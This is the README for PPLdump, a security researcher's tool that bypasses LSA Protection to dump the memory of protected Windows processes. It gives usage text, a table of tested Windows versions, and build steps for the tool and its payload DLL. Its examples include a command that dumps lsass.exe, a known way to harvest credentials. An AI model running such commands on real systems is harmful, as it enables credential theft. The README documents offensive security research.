PPLdump implements a userland exploit, initially discussed by James Forshaw (a.k.a. @tiraniddo) in this blog post, for dumping the memory of any PPL as an administrator.
I wrote two blog posts about this tool. The first part covers Protected Processes concepts, while the second one discusses the bypass technique itself.
- Blog post part #1: Do You Really Know About LSA Protection (RunAsPPL)?
- Blog post part #2: Bypassing LSA Protection in Userland
Usage
Simply run the executable without any argument and you will get a detailed help/usage.
```
c:\Temp>PPLdump64.exe

[PPLdump ASCII-art banner]                version 0.4
                                          by @itm4n

Description:
  Dump the memory of a Protected Process Light (PPL) with a userland exploit

Usage:
  PPLdump.exe [-v] [-d] [-f] <PROC_NAME|PROC_ID> <DUMP_FILE>

Arguments:
  PROC_NAME   The name of a Process to dump
  PROC_ID     The ID of a Process to dump
  DUMP_FILE   The path of the output dump file

Options:
  -v (Verbose)  Enable verbose mode
  -d (Debug)    Enable debug mode (implies verbose)
  -f (Force)    Bypass DefineDosDevice error check

Examples:
  PPLdump.exe lsass.exe lsass.dmp
  PPLdump.exe -v 720 out.dmp
```
Tests
Windows version | Build | Edition | Arch | Admin | SYSTEM |
---|---|---|---|---|---|
Windows 10 20H2 | 19042 | Pro | x64 | ✔️ | ✔️ |
Windows 10 20H2 | 19042 | Pro | x86 | ✔️ | ✔️ |
Windows 10 1909 | 18363 | Pro | x64 | ✔️ | ✔️ |
Windows 10 1507 | 10240 | Educational | x64 | ✔️ | ✔️ |
Windows 10 1507 | 10240 | Home | x64 | ✔️ | ✔️ |
Windows 10 1507 | 10240 | Pro | x64 | ✔️ | ✔️ |
Windows Server 2019 | 17763 | Standard | x64 | ✔️ | ✔️ |
Windows Server 2019 | 17763 | Essentials | x64 | ✔️ | ✔️ |
Windows 8.1 | 9600 | Pro | x64 | ⚠️ | ⚠️ |
Windows Server 2012 R2 | 9600 | Standard | x64 | ⚠️ | ⚠️ |
The exploit fails on fully updated Windows 8.1 / Server 2012 R2 machines. I have yet to figure out which patch caused the error.
```
[-] DefineDosDevice failed with error code 6 - The handle is invalid.
```
On Windows 8.1 / Server 2012 R2, you might also have to compile the binary statically (see “Build instructions” below).
Build Instructions
This Visual Studio Solution comprises two projects (the executable and a payload DLL) that need to be compiled in a specific order. Everything is pre-configured, so you just have to follow these simple instructions. The compiled payload DLL is automatically embedded into the final executable.
- Open the Solution with Visual Studio 2019.
- Select `Release / x64` or `Release / x86` depending on the architecture of the target machine.
- `Build > Build Solution`.

On Windows 8.1 / Server 2012 R2, you might have to compile the binary statically.
- Right-click on the `PPLdump` project.
- Go to `Configuration Properties > C/C++ > Code Generation`.
- Select `Multi-threaded (/MT)` as the `Runtime Library` option.
- Build the Solution.